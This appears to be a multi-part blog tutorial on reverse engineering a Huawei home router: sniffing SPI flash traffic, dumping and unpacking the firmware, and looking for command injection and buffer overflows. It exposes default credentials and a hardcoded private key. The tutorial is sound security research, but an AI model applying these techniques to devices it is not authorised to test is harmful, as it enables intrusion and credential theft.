As I said, I couldn’t find anything. Ideally we’d like to verify that for all input fields, whether they’re in the web interface or some other network interface. Another example of a network interface potentially vulnerable to remote command injections is the “LAN-Side DSL CPE Configuration” protocol, or TR-064. Even though this protocol was designed to be used over the internal network only, it’s been used to configure routers over the internet in the past. Command injection vulnerabilities in some implementations of this protocol have been used to remotely extract data like WiFi credentials from routers with just a few packets.

This router has a binary conveniently named /bin/tr064; if we take a look, we find this right in the main() function:

/bin/tr064 using /etc/serverkey.pem

That’s the private RSA key we found in Part 2 being used for SSL authentication. Now we might be able to supplant a router in the system and look for vulnerabilities in their servers, or we might use it to find other attack vectors. Most importantly, it closes the mistery of the private key we found while scouting the firmware.

Looking for More Complex Vulnerabilities [Theory]

Even if we couldn’t find any command injection vulnerabilities, there are always other vectors to gain control of the router. The most common ones are good old buffer overflows. Any input string into the router, whether it is for a shell command or any other purpose, is handled, modified and passed around the code. An error by the developer calculating expected buffer lengths, not validating them, etc. in those string operations can result in an exploitable buffer overflow, which an attacker can use to gain control of the system.

The idea behind a buffer overflow is rather simple: We manage to pass a string into the system that contains executable code. We override some address in the program so the execution flow jumps into the code we just injected. Now we can do anything that binary could do -in embedded systems like this one, where everything runs as root, it means immediate root pwnage.

Introducing an unexpectedly long input

Developing an exploit for this sort of vulnerability is not as simple as appending commands to find your way around a filter. There are multiple possible scenarios, and different techniques to handle them. Exploits using more involved techniques like ROP can become necessary in some cases. That being said, most household embedded systems nowadays are decades behind personal computers in terms of anti-exploitation techniques. Methods like Address Space Layout Randomization(ASLR), which are designed to make exploit development much more complicated, are usually disabled or not implemented at all.

If you’d like to find a potential vulnerability so you can learn exploit development on your own, you can use the same techniques we’ve been using so far. Find potentially interesting inputs, locate the code that manages them using function names, hardcoded strings, etc. and try to trigger a malfunction sending an unexpected input. If we find an improperly handled string, we might have an exploitable bug.

Once we’ve located the piece of disassembled code we’re going to attack, we’re mostly interested in string manipulation functions like strcpystrcat,sprintf, etc. Their more secure counterparts strncpystrncat, etc. are also potentially vulnerable to some techniques, but usually much more complicated to work with.

Pic of strcpy handling an input

Even though I’m not sure that function -extracted from /bin/tr064— is passed any user inputs, it’s still a good example of the sort of code you should be looking for. Once you find potentially insecure string operations that may handle user input, you need to figure out whether there’s an exploitable bug.

Try to cause a crash by sending unexpectedly long inputs and work from there. Why did it crash? How many characters can I send without causing a crash? Which payload can I fit in there? Where does it land in memory? etc. etc. I may write about this process in more detail at some point, but there’s plenty of literature available online if you’re interested.

Don’t spend all your efforts on the most obvious inputs only -which are also more likely to be properly filtered/handled-; using tools like the burp web proxy (or even the browser itself), we can modify fields like cookies to check for buffer overflows.

Web vulnerabilities like CSRF are also extremely common in embedded devices with web interfaces. Exploiting them to write to files or bypass authentication can lead to absolute control of the router, specially when combined with command injections. An authentication bypass for a router with the web interface available from the Internet could very well expose the network to being remotely man in the middle’d. They’re definitely an important attack vector, even though I’m not gonna go into how to find them.

Decompiling Binaries [Theory]

When you decompile a binary, instead of simply translating Machine Code to Assembly Code, the decompiler uses algorithms to identify functions, loops, branches, etc. and replicate them in a higher level language like C or Python.

That sounds like a brilliant idea for anybody who has been banging their head against some assembly code for a few hours, but an additional layer of abstraction means more potential errors, which can result in massive wastes of time.

In my (admittedly short) personal experience, the output just doesn’t look reliable enough. It might be fine when using expensive decompilers (IDA itself supports a couple of architectures), but I haven’t found one I can trust with MIPS binaries. That being said, if you’d like to give one a try, the RetDec online decompiler supports multiple architectures- including MIPS.

Binary Decompiled to C by RetDec

Even as a ‘high level’ language, the code is not exactly pretty to look at.

Next Steps

Whether we want to learn something about an algorithm we’re reversing, to debug an exploit we’re developing or to find any other sort of vulnerability, being able to execute (and, if possible, debug) the binary on an environment we fully control would be a massive advantage. In some/most cases -like this router-, being able to debug on the original hardware is not possible. In the next post, we’ll work on CPU emulation to debug the binaries in our own computers.

Thanks for reading! I’m sorry this post took so long to come out. Between work,hardwear.io and seeing family/friends, this post was written about 1 paragraph at a time from 4 different countries. Things should slow down for a while, so hopefully I’ll be able to publish Part 6 soon. I’ve also got some other reversing projects coming down the pipeline, starting with hacking the Amazon Echo and a router with JTAG. I’ll try to get to those soon, work permitting… Happy Hacking 🙂


Tips and Tricks

Mistaken xrefs and how to remove them

Sometimes an address is loaded into a register for 16bit/32bit adjustments. The contents of that address have no effect on the rest of the code; it’s just a routinary adjustment. If the address that is assigned to the register happens to be pointing to some valid data, IDA will rename the address in the assembly and display the contents in a comment.

It is up to you to figure out whether an x-ref makes sense or not. If it doesn’t, select the variable and press o in IDA to ignore the contents and give you only the address. This makes the code much less confusing.

Setting function prototypes so IDA comments the args around calls for us

Set the cursor on a function and press y. Set the prototype for the function: e.g. int memcpy(void *restrict dst, const void *restrict src, int n);. Note:IDA only understands built-in types, so we can’t use types like size_t.

Once again we can use the extern declarations found in the GPL source code. When available, find the declaration for a specific function, and use the same types and names for the arguments in IDA.

Taking Advantage of the GPL Source Code

If we wanna figure out what are the 1st and 2nd parameters of a function likeATP_DBSetPara, we can sometimes rely on the GPL source code. Lots of functions are not implemented in the kernel or any other open source component, but they’re still used from one of them. That means we can’t see the code we’re interested in, but we can see the extern declarations for it. Sometimes the source will include documentation comments or descriptive variable names; very useful info that the disassembly doesn’t provide:

ATP_DBSetPara extern declaration in gpl_source/inc/cfmapi.h

Unfortunately, the function documentation comment is not very useful in this case -seems like there were encoding issues with the file at some point, and everything written in Chinese was lost. At least now we know that the first argument is a list of keys, and the second is something they call ParamCMOParamCMO is a constant in our disassembly, so it’s probably just a reference to the key we’re trying to set.

Disassembly Methods — Linear Sweep vs Recursive Descent

The structure of a binary can vary greatly depending on compiler, developers, etc. How functions call each other is not always straightforward for a disassembler to figure out. That means you may run into lots of ‘orphaned’ functions, which exist in the binary but do not have a known caller.

Which disassembler you use will dictate whether you see those functions or not, some of which can be extremely important to us (e.g. the ping function in theweb binary we reversed earlier). This is due to how they scan binaries for content:

  1. Linear Sweep: Read the binary one byte at a time, anything that looks like a function is presented to the user. This requires significant logic to keep false positives to a minimum
  2. Recursive Descent: We know the binary’s entry point. We find all functions called from main(), then we find the functions called from those, and keep recursively displaying functions until we’ve got “all” of them. This method is very robust, but any functions not referenced in a standard/direct way will be left out

Make sure your disassembler supports linear sweep if you feel like you’re missing any data. Make sure the code you’re looking at makes sense if you’re using linear sweep.

Practical Reverse Engineering Part 4 — Dumping the Flash

Projects and learnt lessons on Systems Security, Embedded Development, IoT and anything worth writing about

  • Part 1: Hunting for Debug Ports
  • Part 2: Scouting the Firmware
  • Part 3: Following the Data
  • Part 4: Dumping the Flash
  • Part 5: Digging Through the Firmware

In Parts 1 to 3 we’ve been gathering data within its context. We could sniff the specific pieces of data we were interested in, or observe the resources used by each process. On the other hand, they had some serious limitations; we didn’t have access to ALL the data, and we had to deal with very minimal tools… And what if we had not been able to find a serial port on the PCB? What if we had but it didn’t use default credentials?

In this post we’re gonna get the data straight from the source, sacrificing context in favour of absolute access. We’re gonna dump the data from the Flash IC and decompress it so it’s usable. This method doesn’t require expensive equipment and is independent of everything we’ve done until now. An external Flash IC with a public datasheet is a reverser’s great ally.

Dumping the Memory Contents

As discussed in Part 3, we’ve got access to the datasheet for the Flash IC, so there’s no need to reverse its pinout:

Flash Pic Annotated Pinout

We also have its instruction set, so we can communicate with the IC using almost any device capable of ‘speaking’ SPI.

We also know that powering up the router will cause the Ralink to start communicating with the Flash IC, which would interfere with our own attempts to read the data. We need to stop the communication between the Ralink and the Flash IC, but the best way to do that depends on the design of the circuit we’re working with.

Do We Need to Desolder The Flash IC? [Theory]

The perfect way to avoid interference would be to simply desolder the Flash IC so it’s completely isolated from the rest of the circuit. It gives us absolute control and removes all possible sources of interference. Unfortunately, it also requires additional equipment, experience and time, so let’s see if we can avoid it.

The second option would be to find a way of keeping the Ralink inactive while everything else around it stays in standby. Microcontrollers often have a Reset pin that will force them to shut down when pulled to 0; they’re commonly used to force IC reboots without interrupting power to the board. In this case we don’t have access to the Ralink’s full datasheet (it’s probably distributed only to customers and under NDA); the IC’s form factor and the complexity of the circuit around it make for a very hard pinout to reverse, so let’s keep thinking…

What about powering one IC up but not the other? We can try applying voltage directly to the power pins of the Flash IC instead of powering up the whole circuit. Injecting power into the PCB in a way it wasn’t designed for could blow something up; we could reverse engineer the power circuit, but that’s tedious work. This router is cheap and widely available, so I took the ‘fuck it’ approach. The voltage required, according to the datasheet, is 3V; I’m just gonna apply power directly to the Flash IC and see what happens. It may power up the Ralink too, but it’s worth a try.

Flash Powered UART Connected

We start supplying power while observing the board and waiting for data from the Ralink’s UART port. We can see some LEDs light up at the back of the PCB, but there’s no data coming out of the UART port; the Ralink must not be running. Even though the Ralink is off, its connection to the Flash IC may still interfere with our traffic because of multiple design factors in both power circuit and the silicon. It’s important to keep that possibility in mind in case we see anything dodgy later on; if that was to happen we’d have to desolder the Flash IC (or just its data pins) to physically disconnect it from everything else.

The LEDs and other static components can’t communicate with the Flash IC, so they won’t be an issue as long as we can supply enough current for all of them. I’m just gonna use a bench power supply, with plenty of current available for everything. If you don’t have one you can try using the Master’s power lines, or some USB power adapter if you need some more current. They’ll probably do just fine.

Time to connect our SPI Master.

Connecting to the Flash IC

Now that we’ve confirmed there’s no need to desolder the Ralink we can connect any device that speaks SPI and start reading memory contents block by block. Any microcontroller will do, but a purpose-specific SPI-USB bridge will often be much faster. In this case I’m gonna be using a board based on the FT232H, which supports SPI among some other low level protocols.

We’ve got the pinout for both the Flash and my USB-SPI bridge, so let’s get everything connected.

Shikra and Power Connected to Flash

Now that the hardware is ready it’s time to start pumping data out.

Dumping the Data

We need some software in our computer that can understand the USB-SPI bridge’s traffic and replicate the memory contents as a binary file. Writing our own wouldn’t be difficult, but there are programs out there that already support lots of common Masters and Flash ICs. Let’s try the widely known and open source flashrom.

flashrom is old and buggy, but it already supports both the FT232H as Master and the FL064PIF as Slave. It gave me lots of trouble in both OSX and an Ubuntu VM, but ended up working just fine on a Raspberry Pi (Raspbian):

flashrom stdout

Success! We’ve got our memory dump, so we can ditch the hardware and start preparing the data for analysis.

Splitting the Binary

The file command has been able to identify some data about the binary, but that’s just because it starts with a header in a supported format. In a 0-knowledge scenario we’d use binwalk to take a first look at the binary file and find the data we’d like to extract.

Binwalk is a very useful tool for binary analysis created by the awesome hackers at /dev/ttyS0; you’ll certainly get to know them if you’re into hardware hacking.

binwalk spidump.bin

In this case we’re not in a 0-knowledge scenario; we’ve been gathering data since day 1, and we obtained a complete memory map of the Flash IC in Part 2. The addresses mentioned in the debug message are confirmed by binwalk, and it makes for much cleaner splitting of the binary, so let’s use it:

Flash Memory Map From Part 2

With the binary and the relevant addresses, it’s time to split the binary into its 4 basic segments. dd takes its parameters in terms of block size (bs, bytes), offset (skip, blocks) and size (count, blocks); all of them in decimal. We can use a calculator or let the shell do the hex do decimal conversions with $(()):

$ dd if=spidump.bin of=bootloader.bin bs=1 count=$((0x020000))
    131072+0 records in
    131072+0 records out
    131072 bytes transferred in 0.215768 secs (607467 bytes/sec)
$ dd if=spidump.bin of=mainkernel.bin bs=1 count=$((0x13D000-0x020000)) skip=$((0x020000))
    1167360+0 records in
    1167360+0 records out
    1167360 bytes transferred in 1.900925 secs (614101 bytes/sec)
$ dd if=spidump.bin of=mainrootfs.bin bs=1 count=$((0x660000-0x13D000)) skip=$((0x13D000))
    5386240+0 records in
    5386240+0 records out
    5386240 bytes transferred in 9.163635 secs (587784 bytes/sec)
$ dd if=spidump.bin of=protect.bin bs=1 count=$((0x800000-0x660000)) skip=$((0x660000))
    1703936+0 records in
    1703936+0 records out
    1703936 bytes transferred in 2.743594 secs (621060 bytes/sec)

We have created 4 different binary files:

  1. bootloader.bin: U-boot. The bootloader. It’s not compressed because the Ralink wouldn’t know how to decompress it.
  2. mainkernel.bin: Linux Kernel. The basic firmware in charge of controlling the bare metal. Compressed using lzma
  3. mainrootfs.bin: Filesystem. Contains all sorts of important binaries and configuration files. Compressed as squashfs using the lzma algorithm
  4. protect.bin: Miscellaneous data as explained in Part 3. Not compressed

Extracting the Data

Now that we’ve split the binary into its 4 basic segments, let’s take a closer look at each of them.

Bootloader

binwalk bootloader.bin

Binwalk found the uImage header and decoded it for us. U-Boot uses these headers to identify relevant memory areas. It’s the same info that the file command displayed when we fed it the whole memory dump because it’s the first header in the file.

We don’t care much for the bootloader’s contents in this case, so let’s ignore it.

Kernel

binwalk mainkernel.bin

Compression is something we have to deal with before we can make any use of the data. binwalk has confirmed what we discovered in Part 2, the kernel is compressed using lzma, a very popular compression algorithm in embedded systems. A quick check with strings mainkernel.bin | less confirms there’s no human readable data in the binary, as expected.

There are multiple tools that can decompress lzma, such as 7z or xz. None of those liked mainkernel.bin:

$ xz --decompress mainkernel.bin
xz: mainkernel.bin: File format not recognized

The uImage header is probably messing with tools, so we’re gonna have to strip it out. We know the lzma data starts at byte 0x40, so let’s copy everything but the first 64 bytes.

dd if=mainkernel of=noheader

And when we try to decompress…

$ xz --decompress mainkernel_noheader.lzma
xz: mainkernel_noheader.lzma: Compressed data is corrupt

xz has been able to recognize the file as lzma, but now it doesn’t like the data itself. We’re trying to decompress the whole mainkernel Flash area, but the stored data is extremely unlikely to be occupying 100% of the memory segment. Let’s remove any unused memory from the tail of the binary and try again:

Cut off the tail; decompression success

xz seems to have decompressed the data successfully. We can easily verify that using the strings command, which finds ASCII strings in binary files. Since we’re at it, we may as well look for something useful…

strings kernel grep key

The Wi-Fi Easy and Secure Key Derivation string looks promising, but as it turns out it’s just a hardcoded string defined by the Wi-Fi Protected Setup spec. Nothing to do with the password generation algorithm we’re interested in.

We’ve proven the data has been properly decompressed, so let’s keep moving.

Filesystem

binwalk mainrootfs.bin

The mainrootfs memory segment does not have a uImage header because it’s relevant to the kernel but not to U-Boot.

SquashFS is a very common filesystem in embedded systems. There are multiple versions and variations, and manufacturers sometimes use custom signatures to make the data harder to locate inside the binary. We may have to fiddle with multiple versions of unsquashfs and/or modify the signatures, so let me show you what the signature looks like in this case:

sqsh signature in hexdump

Since the filesystem is very common and finding the right configuration is tedious work, somebody may have already written a script to automate the task. I came across this OSX-specific fork of the Firmware Modification Kit, which compiles multiple versions of unsquashfs and includes a neat script called unsquashfs_all.sh to run all of them. It’s worth a try.

unsquashfs_all.sh mainrootfs.bin

Wasn’t that easy? We got lucky with the SquashFS version and supported signature, and unsquashfs_all.sh managed to decompress the filesystem. Now we’ve got every binary in the filesystem, every symlink and configuration file, and everything is nice and tidy:

tree unsquashed_filesystem

In the complete file tree we can see we’ve got every file in the system, (other than runtime files like those in /var/, of course).

Using the intel we have been gathering on the firmware since day 1 we can start looking for potentially interesting binaries:

grep -i -r '$INTEL' squashfs-root

If we were looking for network/application vulnerabilities in the router, having every binary and config file in the system would be massively useful.

Protected

binwalk protect.bin

As we discussed in Part 3, this memory area is not compressed and contains all pieces of data that need to survive across reboots but be different across devices. strings seems like an appropriate tool for a quick overview of the data:

strings protect.bin

Everything in there seems to be just the curcfg.xml contents, some logs and those few isolated strings in the picture. We already sniffed and analysed all of that data in Part 3, so there’s nothing else to discuss here.

Next Steps

At this point all hardware reversing for the Ralink is complete and we’ve collected everything there was to collect in ROM. Just think of what you may be interested in and there has to be a way to find it. Imagine we wanted to control the router through the UART debug port we found in Part 1, but when we try to access the ATP CLI we can’t figure out the credentials. After dumping the external Flash we’d be able to find the XML file in the protect area, and discover the credentials just like we did in Part 2 (The Rambo Approach to Intel Gatheringadmin:admin).

If you couldn’t dump the memory IC for any reason, the firmware upgrade files provided by the manufacturers will sometimes be complete memory segments; the device simply overwrites the relevant flash areas using code previously loaded to RAM. Downloading the file from the manufacturer would be the equivalent of dumping those segments from flash, so we just need to decompress them. They won’t have all the data, but it may be enough for your purposes.

Now that we’ve got the firmware we just need to think of anything we may be interested in and start looking for it through the data. In the next post we’ll dig a bit into different binaries and try to find more potentially useful data.

Practical Reverse Engineering Part 3 — Following the Data

Projects and learnt lessons on Systems Security, Embedded Development, IoT and anything worth writing about

  • Part 1: Hunting for Debug Ports
  • Part 2: Scouting the Firmware
  • Part 3: Following the Data
  • Part 4: Dumping the Flash
  • Part 5: Digging Through the Firmware

The best thing about hardware hacking is having full access to very bare metal, and all the electrical signals that make the system work. With ingenuity and access to the right equipment we should be able to obtain any data we want. From simply sniffing traffic with a cheap logic analyser to using thousands of dollars worth of equipment to obtain private keys by measuring the power consumed by the device with enough precision (power analysis side channel attack); if the physics make sense, it’s likely to work given the right circumstances.

In this post I’d like to discuss traffic sniffing and how we can use it to gather intel.

Traffic sniffing at a practical level is used all the time for all sorts of purposes, from regular debugging during the delopment process to reversing the interface of gaming controllers, etc. It’s definitely worth a post of its own, even though this device can be reversed without it.

Please check out the legal disclaimer in case I come across anything sensitive.

Full disclosure: I’m in contact with Huawei’s security team. I tried to contact TalkTalk, but their security staff is nowhere to be seen.

Data Flows In the PCB

Data is useless within its static memory cells, it needs to be read, written and passed around in order to be useful. A quick look at the board is enough to deduce where the data is flowing through, based on IC placement and PCB traces:

PCB With Data Flows and Some IC Names

We’re not looking for hardware backdoors or anything buried too deep, so we’re only gonna look into the SPI data flowing between the Ralink and its external Flash.

Pretty much every IC in the market has a datasheet documenting all its technical characteristics, from pinouts to power usage and communication protocols. There are tons of public datasheets on google, so find the ones relevant to the traffic you want to sniff:

Now we’ve got pinouts, electrical characteristics, protocol details… Let’s take a first look and extract the most relevant pieces of data.

Understanding the Flash IC

We know which data flow we’re interested: The SPI traffic between the Ralink IC and Flash. Let’s get started; the first thing we need is to figure out how to connect the logic analyser. In this case we’ve got the datasheet for the Flash IC, so there’s no need to reverse engineer any pinouts:

Flash Pic Annotated Pinout

Standard SPI communication uses 4 pins:

  1. MISO (Master In Slave Out): Data line Ralink<-Flash
  2. MOSI (Master Out Slave In): Data line Ralink->Flash
  3. SCK (Clock Signal): Coordinates when to read the data lines
  4. CS# (Chip Select): Enables the Flash IC when set to 0 so multiple of them can share MISO/MOSI/SCK lines.

We know the pinout, so let’s just connect a logic analyser to those 4 pins and capture some random transmission:

Connected Logic Analyser

In order to set up our logic analyser we need to find out some SPI configuation options, specifically:

  • Transmission endianness [Standard: MSB First]
  • Number of bits per transfer [Standard: 8]. Will be obvious in the capture
  • CPOL: Default state of the clock line while inactive [0 or 1]. Will be obvious in the capture
  • CPHA: Clock edge that triggers the data read in the data lines [0=leading, 1=trailing]. We’ll have to deduce this

The datasheet explains that the flash IC understands only 2 combinations of CPOL and CPHA: (CPOL=0, CPHA=0) or (CPOL=1, CPHA=1)

Datasheet SPI Settings

Let’s take a first look at some sniffed data:

Logic Screencap With CPOL/CPHA Annotated

In order to understand exactly what’s happenning you’ll need the FL064PIF’s instruction set, available in its datasheet:

FL064PIF Instruction Set

Now we can finally analyse the captured data:

Logic Sample SPI Packet

In the datasheet we can see that the FL064PIF has high-performance features for read and write operations: Dual and Quad options that multiplex the data over more lines to increase the transmission speed. From taking a few samples, it doesn’t seem like the router uses these features much -if at all-, but it’s important to keep the possibility in mind in case we see something odd in a capture.

Transmission modes that require additional pins can be a problem if your logic analyser is not powerful enough.

The Importance of Your Sampling Rate [Theory]

A logic analyser is a conceptually simple device: It reads signal lines as digital inputs every x microseconds for y seconds, and when it’s done it sends the data to your computer to be analysed.

For the protocol analyser to generate accurate data it’s vital that we record digital inputs faster than the device writes them. Otherwise the data will be mangled by missing bits or deformed waveforms.

Unfortunately, your logic analyser’s maximum sampling rate depends on how powerful/expensive it is and how many lines you need to sniff at a time. High-speed interfaces with multiple data lines can be a problem if you don’t have access to expensive equipment.

I recorded this data from the Ralink-Flash SPI bus using a low-end Saleae analyser at its maximum sampling rate for this number of lines, 24 MS/s:

Picture of Deformed Clock Signal

As you can see, even though the clock signal has the 8 low to high transitions required for each byte, the waveform is deformed.

Since the clock signal is used to coordinate when to read the data lines, this kind of waveform deformation may cause data corruption even if we don’t drop any bits (depending partly on the design of your logic analyser). There’s always some wiggle room for read inaccuracies, and we don’t need 100% correct data at this point, but it’s important to keep all error vectors in mind.

Let’s sniff the same bus using a higher performance logic analyser at 100 MS/s:

High Sampling Rate SPI Sample Reading

As you can see, this clock signal is perfectly regular when our Sampling Rate is high enough.

If you see anything dodgy in your traffic capture, consider how much data you’re willing to lose and whether you’re being limited by your equipment. If that’s the case, either skip this Reversing vector or consider investing in a better logic analyser.

Seeing the Data Flow

We’re already familiar with the system thanks to the overview of the firmware we did in Part 2, so we can think of some specific SPI transmissions that we may be interested in sniffing. Simply connecting an oscilloscope to the MISO and MOSI pins will help us figure out how to trigger those transmissions and yield some other useful data.

Scope and UART Connected

Here’s a video (no audio) showing both the serial interface and the MISO/MOSI signals while we manipulate the router:

This is a great way of easily identifying processes or actions that trigger flash read/write actions, and will help us find out when to start recording with the logic analyser and for how long.

Analysing SPI Traffic — ATP’s Save Command

In Post 2 I mentioned ATP CLI has a save command that stores something to flash; unfortunately, the help menu (save ?) won’t tell you what it’s doing and the only output when you run it is a few dots that act as a progress bar. Why don’t we find out by ourselves? Let’s make a plan:

  1. Wait until boot sequence is complete and the router is idle so there’s no unexpected SPI traffic
  2. Start the ATP Cli as explained in Part 1
  3. Connect the oscilloscope to MISO/MOSI and run save to get a rough estimate of how much time we need to capture data for
  4. Set a trigger in the enable line sniffed by the logic analyser so it starts recording as soon as the flash IC is selected
  5. Run save
  6. Analyse the captured data

Steps 3 and 4 can be combined so you see the data flow in real time in the scopewhile you see the charge bar for the logic analyser; that way you can make sure you don’t miss any data. In order to comfortably connect both scope and logic sniffer to the same pins, these test clips come in very handy:

SOIC16 Test Clip Connected to Flash IC

Once we’ve got the traffic we can take a first look at it:

Analysing Save Capture on Logic

Let’s consider what sort of data could be extracted from this traffic dump that might be useful to us. We’re working with a memory storage IC, so we can see the data that is being read/written and the addresses where it belongs. I think we can represent that data in a useful way by 2 means:

  1. Traffic map depicting which Flash areas are being written, read or erased in chronological order
  2. Create binary files that replicate the memory blocks that were read/written, preferably removing all the protocol rubbish that we sniffed along with them.

Saleae’s SPI analyser will export the data as a CSV file. Ideally we’d improve their protocol analyser to add the functionality we want, but that would be too much work for this project. One of the great things about low level protocols like SPI is that they’re usually very straightforward; I decided to write some python spaghetti code to analyse the CSV file and extract the data we’re looking for: binmaker.py andtraffic_mapper.py

The workflow to analyse a capture is the following:

  1. Export sniffed traffic as CSV
  2. Run the script:
    • Iterate through the CSV file
    • Identify different commands by their index
    • Recognise the command expressed by the first byte
    • Process its arguments (addresses, etc.)
    • Identify the read/write payload
    • Convert ASCII representation of each payload byte to binary
    • Write binary blocks to different files for MISO (read) and MOSI (write)
  3. Read the traffic map (regular text) and the binaries (hexdump -C output.bin | less)

The scripts generate these results:

The traffic map is much more useful when combined with the Flash memory map we found in Part 2:

Flash Memory Map From Part 2

From the traffic map we can see the bulk of the save command’s traffic is simple:

  1. Read about 64kB of data from the protect area
  2. Overwrite the data we just read

In the MISO binary we can see most of the read data was just tons of 1s:

Picture MISO Hexdump 0xff

Most of the data in the MOSI binary is plaintext XML, and it looks exactly like the /var/curcfg.xml file we discovered in Part 2. As we discussed then, this “current configuration” file contains tons of useful data, including the current WiFi credentials.

It’s standard to keep reserved areas in flash; they’re mostly for miscellaneous data that needs to survive across reboots and be configurable by user, firmware or factory. It makes sense for a command called save to write data to such area, it explains why the data is perfectly readable as opposed to being compressed like the filesystem, and why we found the XML file in the /var/ folder of the filesystem (it’s a folder for runtime files; data in the protect area has to be loaded to memory separately from the filesystem).

The Pot of Gold at the End of the Firmware [Theory]

During this whole process it’s useful to have some sort of target to keep you digging in the same general direction.

Our target is an old one: the algorithm that generates the router’s default WiFi password. If we get our hands on such algorithm and it happens to derive the password from public information, any HG533 in the world with default WiFi credentials would probably be vulnerable.

That exact security issue has been found countless times in the past, usually deriving the password from public data like the Access Point’s MAC address or its SSID.

That being said, not all routers are vulnerable, and I personally don’t expect this one to be. The main reason behind targeting this specific vector is that it’s caused by a recurrent problem in embedded engineering: The need for a piece of data that is known by the firmware, unique to each device and known by an external entity. From default WiFi passwords to device credentials for IoT devices, this problem manifests in different ways all over the Industry.

Future posts will probably reference the different possibilities I’m about to explain, so let me get all that theory out of the way now.

The Sticker Problem

In this day and era, connecting to your router via ethernet so there’s no need for default WiFi credentials is not an option, using a display to show a randomly generated password would be too expensive, etc. etc. etc. The most widely adopted solution for routers is to create a WiFi network using default credentials, print those credentials on a sticker at the factory and stick it to the back of the device.

Router Sticker - Annotated

The WiFi password is the ‘unique piece of data’, and the computer printing the stickers in the factory is the ‘external entity’. Both the firmware and the computer need to know the default WiFi credentials, so the engineer needs to decide how to coordinate them. Usually there are 2 options available:

  1. The same algorithm is implemented in both the device and the computer, and its input parameters are known to both of them
  2. A computer generates the credentials for each device and they’re stored into each device separately

Developer incompetence aside, the first approach is usually taken as a last resort; if you can’t get your hardware manufacturer to flash unique data to each device or can’t afford the increase in manufacturing cost.

The second approach is much better by design: We’re not trusting the hardware with data sensitive enough to compromise every other device in the field. That being said, the company may still decide to use an algorithm with predictable outputs instead of completely random data; that would make the system as secure as the weakest link between the algorithm -mathematically speaking-, the confidentiality of their source code and the security of the computers/network running it.

Sniffing Factory Reset

So now that we’ve discussed our target, let’s gather some data about it. The first thing we wanna figure out is which actions will kickstart the flow of relevant data on the PCB. In this case there’s 1 particular action: Pressing the Factory Reset button for 10s. This should replace the existing WiFi credentials with the default ones, so the default creds will have to be generated/read. If the key or the generation algorithm need to be retrieved from Flash, we’ll see them in a traffic capture.

That’s exactly what we’re gonna do, and we’re gonna observe the UART interface, the oscilloscope and the logic analyser during/after pressing the reset button. The same process we followed for ATP’s save gives us these results:

UART output:

UART Factory Reset Debug Messages

Traffic overview:

Logic Screencap Traffic Overview

Output from our python scripts:

The traffic map tells us the device first reads and overwrites 2 large chunks of data from the protect area and then reads a smaller chunk of data from the filesystem (possibly part of the next process to execute):

___________________
|Transmission  Map|
|  MOSI  |  MISO  |
|        |0x7e0000| Size: 12    //Part of the Protected area
|        |0x7e0000| Size: 1782
|        |0x7e073d| Size: 63683
| ERASE 0x7e073d  | Size: 64kB
|0x7e073d|        | Size: 195
|0x7e0800|        | Size: 256
|0x7e0900|        | Size: 256
---------//--------
       [...]
---------//--------
|0x7e0600|        | Size: 256
|0x7e0700|        | Size: 61
|        |0x7d0008| Size: 65529 //Part of the Protected area
| ERASE 0x7d0008  | Size: 64kB
|0x7d0008|        | Size: 248
|0x7d0100|        | Size: 256
---------//--------
       [...]
---------//--------
|0x7dff00|        | Size: 256
|0x7d0000|        | Size: 8
|        |0x1c3800| Size: 512   //Part of the Filesystem
|        |0x1c3a00| Size: 512
---------//--------
       [...]
---------//--------
|        |0x1c5a00| Size: 512
|        |0x1c5c00| Size: 512
-------------------

Once again, we combine transmission map and binary files to gain some insight into the system. In this case, the ‘factory reset’ code seems to:

  1. Read ATP_LOG from Flash; it contains info such as remote router accesses or factory resets. It ends with a large chunk of 1s (0xff)
  2. Overwrite that memory segment with 1s
  3. write a ‘new’ ATP_LOG followed by the “current configuration” curcfg.xmlfile
  4. Read compressed (unintelligible to us) memory chunk from the filesystem

The chunk from the filesystem is read AFTER writing the new password to Flash, which doesn’t make sense for a password generation algorithm. That being said, the algorithm may be already loaded into memory, so its absence in the SPI traffic is not conclusive on whether or not it exists.

As part of the MOSI data we can see the new WiFi password be saved to Flash inside the XML string:

Found Current Password MOSI

What about the default password being read? If we look in the MISO binary, it’s nowhere to be seen. Either the Ralink is reading it using a different mode (secure/dual/quad/?) or the credentials/algorithm are already loaded in RAM (no need to read them from Flash again, since they can’t change). The later seems more likely, so I’m not gonna bother updating my scripts to support different read modes. We write down what we’ve found and we’ll get back to the default credentials in the next part.

Since we’re at it, let’s take a look at the SPI traffic generated when setting new WiFi credentials via HTTP: MapMISOMOSI. We can actually see the default credentials being read from the protect area of Flash this time (not sure why the Ralink would load it to set a new password; it’s probably incidental):

Default WiFi Creds In MISO Capture

As you can see, they’re in plain text and separated from almost anything else in Flash. This may very well mean there’s no password generation algorithm in this device, but it is NOT conclusive. The developers could have decided to generate the credentials only once (first boot?) and store them to flash in order to limit the number of times the algorithm is accessed/executed, which helps hide the binary that contains it. Otherwise we could just observe the running processes in the router while we press the Factory Reset button and see which ones spawn or start consuming more resources.

Next Steps

Now that we’ve got the code we need to create binary recreations of the traffic and transmission maps, getting from a capture to binary files takes seconds. I captured other transmissions such as the first few seconds of boot (mapmiso), but there wasn’t much worth discussing. The ability to easily obtain such useful data will probably come in handy moving forward, though.

In the next post we get the data straight from the source, communicating with the Flash IC directly to dump its memory. We’ll deal with compression algorithms for the extracted data, and we’ll keep piecing everything together.

Happy Hacking! 🙂